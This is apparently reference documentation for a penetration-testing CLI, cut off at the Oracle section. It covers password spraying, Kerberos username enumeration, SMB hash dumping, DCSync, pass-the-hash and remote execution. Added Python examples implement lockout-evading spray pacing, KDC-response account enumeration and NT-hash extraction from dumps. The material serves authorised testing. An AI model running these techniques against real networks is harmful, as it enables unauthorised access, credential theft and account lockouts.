Pentest#

The networkscan pentest command provides comprehensive penetration testing capabilities against network services, including credential spraying and service-specific attacks.

Usage#

networkscan pentest [command]

Available Commands#

  • spray password: Password spray authentication attacks across network services
  • spray username: Username enumeration against network services
  • service smb: SMB service pentesting
  • service ssh: SSH service pentesting
  • service telnet: Telnet service pentesting
  • service ldap: LDAP service pentesting and domain enumeration
  • service msrpc: MSRPC service pentesting
  • service kerberos: Kerberos service attacks
  • service winrm: WinRM service pentesting
  • service ftp: FTP service pentesting
  • service oracle: Oracle Database (TNS) pentesting
  • service etcd: etcd pentesting, including Kubernetes Secret decoding
  • scan cve: CVE scanning using nuclei templates

Commands#

Spray Commands#

The spray commands perform credential spraying attacks and username enumeration against network services.

Password Spray#

Perform password spraying attacks against specified targets and services.

Usage#
networkscan pentest spray password --targets 192.168.1.100:445 --service SMB --usernames admin,user --passwords Password123,123456
Supported Services#
  • SSH - Secure Shell protocol
  • SMB - Server Message Block protocol
  • TELNET - Telnet protocol
  • FTP - File Transfer Protocol
  • LDAP - Lightweight Directory Access Protocol
  • KERBEROS - Kerberos authentication protocol
  • MYSQL - MySQL database protocol
  • ORACLE - Oracle Database (TNS) protocol
Key Flags#
  • --targets / -t - Target hosts (IP:port or IP for default port) (required)
  • --service / -s - Target service (required)
  • --usernames / -u - Usernames to spray
  • --passwords / -p - Passwords to spray
  • --username-file - File containing usernames (one per line)
  • --password-file - File containing passwords (one per line)
  • --username-lists - Built-in username lists (SYSTEM_USERNAMES, DOMAIN_USERNAMES, SERVICE_USERNAMES)
  • --password-lists - Built-in password lists (SYSTEM_PASSWORDS, DOMAIN_PASSWORDS, SERVICE_PASSWORDS)
  • --domain / -d - Domain for SMB/LDAP/KERBEROS authentication
  • --local-auth - Force authentication against a local account instead of the domain
  • --ntlm-hashes - NTLM hashes for pass-the-hash authentication (32 hex chars each)
  • --timeout - Connection timeout in milliseconds (default: 5000)
  • --sleep - Delay between password attempts in seconds
  • --jitter - Random jitter percentage (0-100) to apply to sleep delays
  • --max-attempts - Maximum number of attempts to make (0 = unlimited)
  • --stop-on-first-success - Stop after first successful authentication
  • --successful-only - Only show successful authentications in output
Help Text#
networkscan pentest spray password -h
Perform password spraying attacks against specified targets and services.

Usage:
  networkscan pentest spray password [flags]

Flags:
  -h, --help                         help for password
  -t, --targets strings              Target hosts (IP:port or IP for default port)
  -s, --service string               Target service (SSH, SMB, TELNET, FTP, LDAP, KERBEROS)
  -u, --usernames strings            Usernames to spray
  -p, --passwords strings            Passwords to spray
      --username-file string         File containing usernames (one per line)
      --password-file string         File containing passwords (one per line)
      --username-lists strings       Built-in username lists (SYSTEM_USERNAMES, DOMAIN_USERNAMES, SERVICE_USERNAMES)
      --password-lists strings       Built-in password lists (SYSTEM_PASSWORDS, DOMAIN_PASSWORDS, SERVICE_PASSWORDS)
  -d, --domain string                Domain for SMB/LDAP/KERBEROS authentication
      --local-auth                   Force authentication against local account instead of domain
      --ntlm-hashes strings          NTLM hashes for pass-the-hash authentication (32 hex chars each)
      --timeout int                  Connection timeout in milliseconds (default 5000)
      --sleep int                    Delay between password attempts in seconds (default 0)
      --jitter int                   Random jitter percentage (0-100) to apply to sleep delays (default 0)
      --max-attempts int             Maximum number of attempts to make (0 = unlimited) (default 0)
      --stop-on-first-success        Stop after first successful authentication
      --successful-only              Only show successful authentications in output

Global Flags:
  -o, --output string        Output format (signal, json, yaml). Default value is signal (default "signal")
  -f, --output-file string   Path to output file. If blank, will output to STDOUT
  -q, --quiet                Suppress output
  -v, --verbose              Verbose output

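The --sleep, --jitter and --max-attempts flags exist because a spray that is too fast locks accounts instead of finding passwords. The following is an added example, written for this page rather than taken from networkscan, that models that pacing and replays a plan against the Active Directory lockout rule. The rule it assumes (stated here because the page does not describe it) is the one AD applies: badPwdCount grows with every failed bind, resets only when the gap since the previous failure exceeds the observation window, and reaching the threshold locks the account. The user list, password list and policy values are constructed sample input.

```python
"""Lockout-aware pacing for a password spray (added example, not networkscan code)."""
import random
from dataclasses import dataclass


@dataclass(frozen=True)
class Attempt:
    t: float          # seconds since the spray started
    username: str
    password: str


def jittered(sleep_s: float, jitter_pct: int, rng: random.Random) -> float:
    """A delay varied by +/- jitter_pct percent, the way --jitter modifies --sleep."""
    if not 0 <= jitter_pct <= 100:
        raise ValueError("jitter must be between 0 and 100")
    return sleep_s * (1 + rng.uniform(-jitter_pct, jitter_pct) / 100)


def plan_spray(usernames, passwords, lockout_threshold, observation_window_s,
               sleep_s=0.0, jitter_pct=0, max_attempts=0, respect_lockout=True, seed=None):
    """Spray one password across every user per round, never every password against
    one user.  After lockout_threshold-1 rounds the plan pauses for a full observation
    window so the failure counters reset.  max_attempts=0 means unlimited."""
    if respect_lockout and lockout_threshold < 2:
        raise ValueError("a lockout threshold below 2 leaves no safe attempts")
    rng = random.Random(seed)
    rounds_per_window = lockout_threshold - 1
    plan, t = [], 0.0
    for round_no, password in enumerate(passwords):
        if round_no == 0:
            pass
        elif respect_lockout and round_no % rounds_per_window == 0:
            t += observation_window_s + 1          # assumed AD rule: counter resets after the window
        else:
            t += jittered(sleep_s, jitter_pct, rng)
        for user in usernames:
            if max_attempts and len(plan) >= max_attempts:
                return plan
            plan.append(Attempt(t, user, password))
    return plan


def locked_out(plan, lockout_threshold, observation_window_s, valid_creds=frozenset()):
    """Replay a plan against the assumed AD counter rule; returns the users that get locked."""
    bad_count, last_bad, locked = {}, {}, set()
    for a in sorted(plan, key=lambda a: a.t):
        u = a.username
        if u in locked:
            continue
        if (u, a.password) in valid_creds:
            bad_count[u] = 0                        # a successful logon clears the counter
            continue
        if u in last_bad and a.t - last_bad[u] > observation_window_s:
            bad_count[u] = 0                        # window elapsed since the last failure
        bad_count[u] = bad_count.get(u, 0) + 1
        last_bad[u] = a.t
        if bad_count[u] >= lockout_threshold:
            locked.add(u)
    return sorted(locked)


# Constructed sample input: a threshold of 3 inside a 10-minute window is an aggressive policy.
USERS = ["alice", "bob"]
PASSWORDS = ["Winter2024!", "Spring2024!", "Summer2024!", "Autumn2024!", "Welcome1!"]
THRESHOLD, WINDOW = 3, 600

if __name__ == "__main__":
    safe = plan_spray(USERS, PASSWORDS, THRESHOLD, WINDOW, sleep_s=30, seed=7)
    naive = plan_spray(USERS, PASSWORDS, THRESHOLD, WINDOW, sleep_s=30, respect_lockout=False)
    print("paced plan locks:", locked_out(safe, THRESHOLD, WINDOW))      # []
    print("naive plan locks:", locked_out(naive, THRESHOLD, WINDOW))     # ['alice', 'bob']
```

The point to carry over to the real flags: --sleep spaces rounds within a window, but only a pause longer than the observation window after threshold-1 rounds actually resets the counter, and negative jitter can shorten a sleep, so choose the base value with that margin in mind.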
Username Spray#

Perform username enumeration against specified targets and services.

Usage#
networkscan pentest spray username --targets dc.example.com:88 --service KERBEROS --domain EXAMPLE.COM --usernames admin,guest
Key Flags#
  • --targets / -t - Target hosts (IP:port or IP for default port) (required)
  • --service / -s - Target service (currently only KERBEROS supported) (required)
  • --domain / -d - Domain for Kerberos authentication (required)
  • --usernames / -u - Usernames to enumerate
  • --username-file - File containing usernames (one per line)
  • --username-lists - Built-in username lists (SYSTEM_USERNAMES, DOMAIN_USERNAMES, SERVICE_USERNAMES)
  • --username-scheme - Generate usernames using scheme (FLAST, FIRST_DOT_LAST, FIRSTLAST, LASTFIRST, FIRST, LAST, F_LAST, FIRST_LAST)
  • --timeout - Connection timeout in milliseconds (default: 5000)
  • --sleep - Delay between username attempts in seconds
  • --jitter - Random jitter percentage (0-100) to apply to sleep delays
  • --max-attempts - Maximum number of attempts to make (0 = unlimited)
  • --successful-only - Only show successful username enumerations in output
Help Text#
networkscan pentest spray username -h
Perform username enumeration against specified targets and services.

Usage:
  networkscan pentest spray username [flags]

Flags:
  -h, --help                         help for username
  -t, --targets strings              Target hosts (IP:port or IP for default port)
  -s, --service string               Target service (currently only KERBEROS supported)
  -u, --usernames strings            Usernames to enumerate
      --username-file string         File containing usernames (one per line)
      --username-lists strings       Built-in username lists (SYSTEM_USERNAMES, DOMAIN_USERNAMES, SERVICE_USERNAMES)
      --username-scheme string       Generate usernames using scheme (FLAST, FIRST_DOT_LAST, FIRSTLAST, LASTFIRST, FIRST, LAST, F_LAST, FIRST_LAST)
  -d, --domain string                Domain for Kerberos authentication
      --timeout int                  Connection timeout in milliseconds (default 5000)
      --sleep int                    Delay between username attempts in seconds (default 0)
      --jitter int                   Random jitter percentage (0-100) to apply to sleep delays (default 0)
      --max-attempts int             Maximum number of attempts to make (0 = unlimited) (default 0)
      --successful-only              Only show successful username enumerations in output

Global Flags:
  -o, --output string        Output format (signal, json, yaml). Default value is signal (default "signal")
  -f, --output-file string   Path to output file. If blank, will output to STDOUT
  -q, --quiet                Suppress output
  -v, --verbose              Verbose output

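The --username-scheme values above turn a list of people into candidate account names, and the Kerberos-only restriction on this command exists because a KDC answers an AS-REQ differently for existing and non-existing principals even when no password is supplied. The following added example (written for this page; not networkscan code) does both: it generates candidates for each scheme from "First Last" strings, which is an assumption since the page does not state the tool's input format, and it maps the KDC outcomes to what they reveal. The names are constructed sample input.

```python
"""Username candidates per scheme and Kerberos pre-auth enumeration outcomes
(added example, not networkscan code)."""
import unicodedata

SCHEMES = {
    "FLAST":          lambda f, l: f[0] + l,
    "FIRST_DOT_LAST": lambda f, l: f + "." + l,
    "FIRSTLAST":      lambda f, l: f + l,
    "LASTFIRST":      lambda f, l: l + f,
    "FIRST":          lambda f, l: f,
    "LAST":           lambda f, l: l,
    "F_LAST":         lambda f, l: f[0] + "_" + l,
    "FIRST_LAST":     lambda f, l: f + "_" + l,
}


def _ascii_lower(s: str) -> str:
    """Fold accents and case so 'José' becomes 'jose' (sAMAccountNames are ASCII in practice)."""
    return unicodedata.normalize("NFKD", s).encode("ascii", "ignore").decode().lower()


def split_name(full_name: str):
    """First token is the given name, last token the surname; middle names and hyphens are dropped."""
    parts = [p for p in _ascii_lower(full_name).replace("-", "").split() if p]
    if len(parts) < 2:
        raise ValueError(f"need at least a first and a last name: {full_name!r}")
    return parts[0], parts[-1]


def generate_usernames(names, scheme: str):
    """Apply one scheme to every name, de-duplicating while preserving order."""
    try:
        fmt = SCHEMES[scheme.upper()]
    except KeyError:
        raise ValueError(f"unknown scheme {scheme}; choose from {', '.join(SCHEMES)}") from None
    seen, out = set(), []
    for name in names:
        first, last = split_name(name)
        candidate = fmt(first, last)
        if candidate not in seen:
            seen.add(candidate)
            out.append(candidate)
    return out


# An AS-REQ without pre-authentication data: the KDC error code leaks account state.
KDC_ERRORS = {
    6:  ("KDC_ERR_C_PRINCIPAL_UNKNOWN", "does not exist"),
    18: ("KDC_ERR_CLIENT_REVOKED", "exists but is disabled or locked out"),
    25: ("KDC_ERR_PREAUTH_REQUIRED", "exists (pre-authentication required)"),
}


def classify_as_req_result(error_code):
    """Map the response to one probe to what it tells the attacker.  None means an
    AS-REP came back: the account exists with pre-auth disabled (AS-REP roastable)."""
    if error_code is None:
        return ("AS-REP", "exists, no pre-auth required (AS-REP roastable)")
    return KDC_ERRORS.get(error_code, (f"KRB-ERROR {error_code}", "inconclusive"))


# Constructed sample input (duplicate on purpose to show de-duplication).
SAMPLE_NAMES = ["John Smith", "José Núñez", "Mary Ann Lee", "john smith"]

if __name__ == "__main__":
    for scheme in SCHEMES:
        print(f"{scheme:15} {generate_usernames(SAMPLE_NAMES, scheme)}")
    for code in (6, 18, 25, None):
        print(code, classify_as_req_result(code))
```

Feed the generated list to --usernames or write it to a file for --username-file; the classification is why a username spray needs no password list and why its "successful" results mean "the principal exists", not "authenticated".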
Service Commands#

The service commands perform service-specific penetration testing operations against network services.

SMB#

Perform pentest operations against SMB services including authentication testing, command execution, share enumeration, and file downloads.

Usage#
networkscan pentest service smb --targets 192.168.1.100:445 --usernames admin,user --passwords password,123456 --actions AUTH,SHARES_MAP
Available Actions#

Use the --actions flag to specify what operations to perform. Available actions: PROBE, AUTH, SAMDUMP, LSADUMP, SHARES_MAP, SHARE_DOWNLOAD, EXEC. Base enumeration is always performed.

Key Flags#
  • --targets - Target hosts (required)
  • --actions - Actions to perform (see available actions)
  • --usernames / -u - Usernames for authentication
  • --passwords / -p - Passwords for authentication
  • --username-file - File containing usernames (one per line)
  • --password-file - File containing passwords (one per line)
  • --credentials - Credentials in user:pass format
  • --domain / -d - Domain for authentication
  • --ntlm-hash - NTLM hash for pass-the-hash authentication
  • --local-auth - Force authentication against local account instead of domain
  • --execute / -x - Commands to execute on successful auth
  • --command-file - File containing commands to execute
  • --remote-file-path - Remote file path to download (format: SHARE\path\to\file)
  • --timeout - Connection timeout in milliseconds (default: 10000)
  • --stop-on-first-success - Stop after first successful auth
  • --successful-only - Show only successful results
  • --verbose - Enable verbose output
Help Text#
networkscan pentest service smb -h
Perform pentest operations against SMB services.

Usage:
  networkscan pentest service smb [flags]

Flags:
  -h, --help                         help for smb
      --targets strings              Target hosts
      --actions strings              Actions to perform: PROBE,AUTH,SAMDUMP,LSADUMP,SHARES_MAP,SHARE_DOWNLOAD,EXEC
  -u, --usernames strings            Usernames for authentication
  -p, --passwords strings            Passwords for authentication
      --username-file string         File containing usernames (one per line)
      --password-file string         File containing passwords (one per line)
      --credentials string           Credentials in user:pass format
  -d, --domain string                Domain for authentication
      --ntlm-hash string             NTLM hash for pass-the-hash authentication
      --local-auth                   Force authentication against local account instead of domain
  -x, --execute strings              Commands to execute on successful auth
      --command-file string          File containing commands to execute
      --remote-file-path string      Remote file path to download (format: SHARE\path\to\file)
      --timeout int                  Connection timeout in milliseconds (default 10000)
      --stop-on-first-success        Stop after first successful auth
      --successful-only              Show only successful results
      --verbose                      Verbose output

Global Flags:
  -o, --output string        Output format (signal, json, yaml). Default value is signal (default "signal")
  -f, --output-file string   Path to output file. If blank, will output to STDOUT
  -q, --quiet                Suppress output
  -v, --verbose              Verbose output

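The --ntlm-hash flag here (and --ntlm-hashes on the spray command, which demands 32 hex characters per value) takes the NT hash: MD4 over the UTF-16LE encoding of the password. Dumps usually present it as the fourth field of a user:rid:lm:nt::: line, and the LM part must not be passed. The following added example, not part of networkscan, computes the hash, validates the flag format and extracts the NT portion from dump output. MD4 is implemented in pure Python because hashlib's md4 is unavailable on many OpenSSL 3 builds; the dump lines are constructed sample input.

```python
"""NT hash computation and extraction for pass-the-hash flags
(added example, not networkscan code)."""
import re
import struct

_MASK = 0xFFFFFFFF


def _rotl(x: int, n: int) -> int:
    return ((x << n) | (x >> (32 - n))) & _MASK


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4.  Cryptographically broken; used only because NT hashes require it."""
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    msg = bytearray(data) + b"\x80"
    while len(msg) % 64 != 56:
        msg += b"\x00"
    msg += struct.pack("<Q", (len(data) * 8) & 0xFFFFFFFFFFFFFFFF)   # bit length, little-endian
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    rounds = [
        (F, 0x00000000, [3, 7, 11, 19], list(range(16))),
        (G, 0x5A827999, [3, 5, 9, 13], [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15]),
        (H, 0x6ED9EBA1, [3, 9, 11, 15], [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15]),
    ]
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", bytes(msg[off:off + 64]))
        a, b, c, d = state
        for fn, const, shifts, order in rounds:
            for i, k in enumerate(order):
                a = _rotl((a + fn(b, c, d) + X[k] + const) & _MASK, shifts[i % 4])
                a, b, c, d = d, a, b, c          # rotate the working variables
        state = [(s + v) & _MASK for s, v in zip(state, (a, b, c, d))]
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> str:
    """NT hash = MD4(UTF-16LE(password)), rendered as 32 lowercase hex characters."""
    return md4(password.encode("utf-16le")).hex()


def is_nt_hash(value: str) -> bool:
    """Exactly what --ntlm-hashes accepts: 32 hex characters, no LM part, no colon."""
    return re.fullmatch(r"[0-9a-fA-F]{32}", value) is not None


def nt_hashes_from_dump(lines):
    """Pull (user, nt) pairs out of user:rid:lmhash:nthash::: lines, skipping anything else."""
    pairs = []
    for line in lines:
        parts = line.strip().split(":")
        if len(parts) >= 4 and is_nt_hash(parts[3]):
            pairs.append((parts[0], parts[3].lower()))
    return pairs


# Constructed sample dump; the LM field is the well-known empty-LM value.
SAMPLE_DUMP = [
    "[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)",
    "Administrator:500:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::",
    "Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::",
]

if __name__ == "__main__":
    print(nt_hash("password"))                       # 8846f7eaee8fb117ad06bdd830b7586c
    pairs = nt_hashes_from_dump(SAMPLE_DUMP)
    print("--ntlm-hashes " + ",".join(nt for _, nt in pairs))
```

A Guest hash equal to nt_hash("") tells you the account has an empty password, which is worth knowing before spraying it.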
SSH#

Perform pentest operations against SSH services including authentication testing, command execution, and file transfers.

Usage#
networkscan pentest service ssh --targets 192.168.1.100:22 --usernames root,admin --passwords password,123456 --actions AUTH,EXEC
Available Actions#

Available actions: AUTH, EXEC, FILE_TRANSFER

Key Flags#
  • --targets - Target hosts (required)
  • --actions - Actions to perform: AUTH, EXEC, FILE_TRANSFER
  • --usernames / -u - Usernames for authentication
  • --passwords / -p - Passwords for authentication
  • --username-file - File containing usernames (one per line)
  • --password-file - File containing passwords (one per line)
  • --key-file - SSH private key file
  • --execute / -x - Commands to execute on successful auth
  • --command-file - File containing commands to execute
  • --upload - Files to upload (local:remote format)
  • --download - Remote files to download
  • --timeout - Connection timeout in milliseconds (default: 10000)
  • --stop-on-first-success - Stop after first successful auth
  • --successful-only - Show only successful results
Help Text#
networkscan pentest service ssh -h
Perform pentest operations against SSH services.

Usage:
  networkscan pentest service ssh [flags]

Flags:
  -h, --help                         help for ssh
      --targets strings              Target hosts
      --actions strings              Actions to perform: AUTH,EXEC,FILE_TRANSFER
  -u, --usernames strings            Usernames for authentication
  -p, --passwords strings            Passwords for authentication
      --username-file string         File containing usernames (one per line)
      --password-file string         File containing passwords (one per line)
      --key-file string              SSH private key file
  -x, --execute strings              Commands to execute on successful auth
      --command-file string          File containing commands to execute
      --upload strings               Files to upload (local:remote format)
      --download strings             Remote files to download
      --timeout int                  Connection timeout in milliseconds (default 10000)
      --stop-on-first-success        Stop after first successful auth
      --successful-only              Show only successful results

Global Flags:
  -o, --output string        Output format (signal, json, yaml). Default value is signal (default "signal")
  -f, --output-file string   Path to output file. If blank, will output to STDOUT
  -q, --quiet                Suppress output
  -v, --verbose              Verbose output

Telnet#

Perform pentest operations against Telnet services including authentication testing and command execution.

Usage#
networkscan pentest service telnet --targets 192.168.1.100:23 --usernames admin --passwords password --actions AUTH
Available Actions#

Available actions: AUTH

Key Flags#
  • --targets - Target hosts (required)
  • --actions - Actions to perform: AUTH
  • --usernames / -u - Usernames for authentication
  • --passwords / -p - Passwords for authentication
  • --username-file - File containing usernames (one per line)
  • --password-file - File containing passwords (one per line)
  • --execute / -x - Commands to execute on successful auth
  • --command-file - File containing commands to execute
  • --timeout - Connection timeout in milliseconds (default: 10000)
  • --stop-on-first-success - Stop after first successful auth
  • --successful-only - Show only successful results
Help Text#
networkscan pentest service telnet -h
Perform pentest operations against Telnet services.

Usage:
  networkscan pentest service telnet [flags]

Flags:
  -h, --help                         help for telnet
      --targets strings              Target hosts
      --actions strings              Actions to perform: AUTH
  -u, --usernames strings            Usernames for authentication
  -p, --passwords strings            Passwords for authentication
      --username-file string         File containing usernames (one per line)
      --password-file string         File containing passwords (one per line)
  -x, --execute strings              Commands to execute on successful auth
      --command-file string          File containing commands to execute
      --timeout int                  Connection timeout in milliseconds (default 10000)
      --stop-on-first-success        Stop after first successful auth
      --successful-only              Show only successful results

Global Flags:
  -o, --output string        Output format (signal, json, yaml). Default value is signal (default "signal")
  -f, --output-file string   Path to output file. If blank, will output to STDOUT
  -q, --quiet                Suppress output
  -v, --verbose              Verbose output

LDAP#

Perform pentest operations against LDAP services including authentication testing and domain enumeration.

Usage#
networkscan pentest service ldap --targets 192.168.1.10:389 --usernames user --passwords pass --domain EXAMPLE.COM --actions AUTH,DOMAINDUMP
Available Actions#

Available actions: PROBE, AUTH, DOMAINDUMP

Key Flags#
  • --targets - Target hosts (required)
  • --actions - Actions to perform: PROBE, AUTH, DOMAINDUMP
  • --usernames / -u - Usernames for authentication
  • --passwords / -p - Passwords for authentication
  • --username-file - File containing usernames (one per line)
  • --password-file - File containing passwords (one per line)
  • --credentials - Credentials in user:pass format
  • --domain / -d - Domain for authentication
  • --ntlm-hash - NTLM hash for pass-the-hash authentication
  • --local-auth - Force authentication against local account instead of domain
  • --timeout - Connection timeout in milliseconds (default: 10000)
  • --stop-on-first-success - Stop after first successful auth
  • --successful-only - Show only successful results
  • --sleep - Delay in seconds between LDAP queries for stealth mode
  • --jitter - Jitter percentage (0-100) to randomize sleep delays
  • --max-queries - Maximum total LDAP queries to perform (0 = unlimited)
  • --minimal-queries - Use minimal query sets and essential attributes only
  • --collection-methods - Collection methods for domain dump (GROUP, TRUSTS, OBJECTPROPS, CONTAINER, LOCAL_ADMIN) (default: GROUP,CONTAINER,TRUSTS)
Help Text#
networkscan pentest service ldap -h
Perform pentest operations against LDAP services.

Usage:
  networkscan pentest service ldap [flags]

Flags:
  -h, --help                         help for ldap
      --targets strings              Target hosts
      --actions strings              Actions to perform: PROBE,AUTH,DOMAINDUMP
  -u, --usernames strings            Usernames for authentication
  -p, --passwords strings            Passwords for authentication
      --username-file string         File containing usernames (one per line)
      --password-file string         File containing passwords (one per line)
      --credentials string           Credentials in user:pass format
  -d, --domain string                Domain for authentication
      --ntlm-hash string             NTLM hash for pass-the-hash authentication
      --local-auth                   Force authentication against local account instead of domain
      --timeout int                  Connection timeout in milliseconds (default 10000)
      --stop-on-first-success        Stop after first successful auth
      --successful-only              Show only successful results
      --sleep int                    Delay in seconds between LDAP queries for stealth mode (default 0)
      --jitter int                   Jitter percentage (0-100) to randomize sleep delays (default 0)
      --max-queries int              Maximum total LDAP queries to perform (0 = unlimited) (default 0)
      --minimal-queries              Use minimal query sets and essential attributes only
      --collection-methods strings   Collection methods for domain dump (GROUP, TRUSTS, OBJECTPROPS, CONTAINER, LOCAL_ADMIN) (default [GROUP,CONTAINER,TRUSTS])

Global Flags:
  -o, --output string        Output format (signal, json, yaml). Default value is signal (default "signal")
  -f, --output-file string   Path to output file. If blank, will output to STDOUT
  -q, --quiet                Suppress output
  -v, --verbose              Verbose output

MSRPC#

Perform pentest operations against MS-RPC services including DCSync attacks via DRSUAPI.

Usage#
networkscan pentest service msrpc --targets dc.example.com:445 --usernames admin --passwords Password123 --domain EXAMPLE.COM --actions DCSYNC
Key Flags#
  • --targets - Target hosts (required)
  • --usernames / -u - Username for authentication
  • --passwords / -p - Password for authentication
  • --ntlm-hash - NTLM hash for pass-the-hash authentication
  • --kerberos-ticket - Base64-encoded Kerberos ticket (TGS) for ticket-based authentication
  • --domain - Domain name (required for DCSync)
  • --actions - Actions to perform: DCSYNC (required)
  • --timeout - Connection timeout in seconds (default: 10). Note that this command takes seconds, unlike the millisecond timeouts of the other service commands
Help Text#
networkscan pentest service msrpc -h
Perform pentest operations against MS-RPC services including DCSync attacks via DRSUAPI.

Usage:
  networkscan pentest service msrpc [flags]

Flags:
  -h, --help                         help for msrpc
      --targets strings              Target hosts (required)
  -u, --usernames strings            Username for authentication
  -p, --passwords strings            Password for authentication
      --ntlm-hash string             NTLM hash for pass-the-hash authentication
      --kerberos-ticket string       Base64-encoded Kerberos ticket (TGS) for ticket-based authentication
      --domain string                Domain name (required for DCSync)
      --actions strings              Actions to perform: DCSYNC (required)
      --timeout int                  Connection timeout in seconds (default 10)

Global Flags:
  -o, --output string        Output format (signal, json, yaml). Default value is signal (default "signal")
  -f, --output-file string   Path to output file. If blank, will output to STDOUT
  -q, --quiet                Suppress output
  -v, --verbose              Verbose output

Kerberos#

Perform pentest operations against Kerberos services including advanced attacks such as constrained delegation.

Usage#
networkscan pentest service kerberos --targets dc.example.com:88 --usernames user --passwords pass --domain EXAMPLE.COM --actions SERVICE_TICKET --spn HTTP/server.example.com
Key Flags#
  • --targets - Target domain controllers (DC.domain.com:88) (required)
  • --actions - Actions to perform: SERVICE_TICKET
  • --usernames / -u - Username for authentication
  • --passwords / -p - Password for user
  • --ntlm-hash - NTLM hash for user authentication
  • --domain / -d - Domain name
  • --spn - Target Service Principal Name (e.g., HTTP/server.domain.com)
  • --impersonate - Target user to impersonate (optional, for delegation attacks)
  • --timeout - Connection timeout in milliseconds (default: 5000)
Help Text#
networkscan pentest service kerberos -h
Perform pentest operations against Kerberos services.

Usage:
  networkscan pentest service kerberos [flags]

Flags:
  -h, --help                         help for kerberos
      --targets strings              Target domain controllers (DC.domain.com:88)
      --actions strings              Actions to perform: SERVICE_TICKET
  -u, --usernames strings            Username for authentication
  -p, --passwords strings            Password for user
      --ntlm-hash string             NTLM hash for user authentication
  -d, --domain string                Domain name
      --spn string                   Target Service Principal Name (e.g., HTTP/server.domain.com)
      --impersonate string           Target user to impersonate (optional, for delegation attacks)
      --timeout int                  Connection timeout in milliseconds (default 5000)

Global Flags:
  -o, --output string        Output format (signal, json, yaml). Default value is signal (default "signal")
  -f, --output-file string   Path to output file. If blank, will output to STDOUT
  -q, --quiet                Suppress output
  -v, --verbose              Verbose output

WinRM#

Perform pentest operations against WinRM services including authentication testing and command execution.

Usage#
networkscan pentest service winrm --targets 192.168.1.100 --usernames admin --passwords Password123 --actions AUTH,EXEC
Available Actions#

Available actions: AUTH, EXEC

Key Flags#
  • --targets - Target hosts (required)
  • --actions - Actions to perform: AUTH, EXEC
  • --usernames / -u - Usernames for authentication
  • --passwords / -p - Passwords for authentication
  • --username-file - File containing usernames (one per line)
  • --password-file - File containing passwords (one per line)
  • --domain / -d - Domain for authentication
  • --local-auth - Force authentication against local account instead of domain
  • --execute / -x - Commands to execute on successful auth
  • --command-file - File containing commands to execute
  • --port - WinRM port (default: 5985 for HTTP, 5986 for HTTPS)
  • --https - Use HTTPS instead of HTTP
  • --insecure - Skip TLS certificate verification
  • --timeout - Connection timeout in milliseconds (default: 10000)
  • --stop-on-first-success - Stop after first successful auth
  • --successful-only - Show only successful results
Help Text#
networkscan pentest service winrm -h
Perform pentest operations against WinRM services.

Usage:
  networkscan pentest service winrm [flags]

Flags:
  -h, --help                         help for winrm
      --targets strings              Target hosts
      --actions strings              Actions to perform: AUTH,EXEC
  -u, --usernames strings            Usernames for authentication
  -p, --passwords strings            Passwords for authentication
      --username-file string         File containing usernames (one per line)
      --password-file string         File containing passwords (one per line)
  -d, --domain string                Domain for authentication
      --local-auth                   Force authentication against local account instead of domain
  -x, --execute strings              Commands to execute on successful auth
      --command-file string          File containing commands to execute
      --port int                     WinRM port (default: 5985 for HTTP, 5986 for HTTPS) (default 0)
      --https                        Use HTTPS instead of HTTP
      --insecure                     Skip TLS certificate verification
      --timeout int                  Connection timeout in milliseconds (default 10000)
      --stop-on-first-success        Stop after first successful auth
      --successful-only              Show only successful results

Global Flags:
  -o, --output string        Output format (signal, json, yaml). Default value is signal (default "signal")
  -f, --output-file string   Path to output file. If blank, will output to STDOUT
  -q, --quiet                Suppress output
  -v, --verbose              Verbose output

FTP#

Perform pentest operations against FTP services including directory enumeration, write permission testing, file download, and file upload.

Usage#
networkscan pentest service ftp --targets 192.168.1.100:21 --username anonymous --password "" --actions LIST
Available Actions#

Available actions: LIST, WRITE_TEST, DOWNLOAD, UPLOAD

Key Flags#
  • --targets - Target hosts (required)
  • --actions - Actions to perform: LIST, WRITE_TEST, DOWNLOAD, UPLOAD
  • --username / -u - Username for authentication
  • --password / -p - Password for authentication
  • --list-paths - Directories to list (defaults to landing directory)
  • --recursive - Recursively list subdirectories
  • --max-depth - Max recursion depth for listing (default: 5)
  • --write-test-paths - Directories to test write permissions (defaults to landing directory)
  • --download - Remote file paths to download
  • --max-download-size - Max file size in bytes to download (default: 1048576 / 1MB)
  • --upload-content - Files to upload as remote_path:base64content
  • --max-upload-size - Max file size in bytes to upload (default: 1048576 / 1MB)
  • --timeout - Connection timeout in milliseconds (default: 10000)
Help Text#
networkscan pentest service ftp -h
Perform pentest operations against FTP services.

Usage:
  networkscan pentest service ftp [flags]

Flags:
  -h, --help                         help for ftp
      --targets strings              Target hosts
      --actions strings              Actions to perform: LIST,WRITE_TEST,DOWNLOAD,UPLOAD
  -u, --username string              Username for authentication
  -p, --password string              Password for authentication
      --list-paths strings           Directories to list (defaults to landing directory)
      --recursive                    Recursively list subdirectories
      --max-depth int                Max recursion depth for listing (default 5)
      --write-test-paths strings     Directories to test write permissions (defaults to landing directory)
      --download strings             Remote file paths to download
      --max-download-size int        Max file size in bytes to download (default 1MB) (default 1048576)
      --upload-content strings       Files to upload as remote_path:base64content
      --max-upload-size int          Max file size in bytes to upload (default 1MB) (default 1048576)
      --timeout int                  Connection timeout in milliseconds (default 10000)

Global Flags:
  -o, --output string        Output format (signal, json, yaml). Default value is signal (default "signal")
  -f, --output-file string   Path to output file. If blank, will output to STDOUT
  -q, --quiet                Suppress output
  -v, --verbose              Verbose output

Oracle#

The Oracle pentest command provides TNS listener enumeration, server fingerprinting, credential testing, and authenticated query execution against Oracle Database services.

Usage#
networkscan pentest service oracle --targets 192.168.1.50:1521 --actions LISTENER,PROBE
networkscan pentest service oracle --targets 192.168.1.50:1521 --sid ORCL --usernames system --passwords manager --actions AUTH,QUERY --query-types SESSION_PRIVS,DBA_USERS
Available Actions#
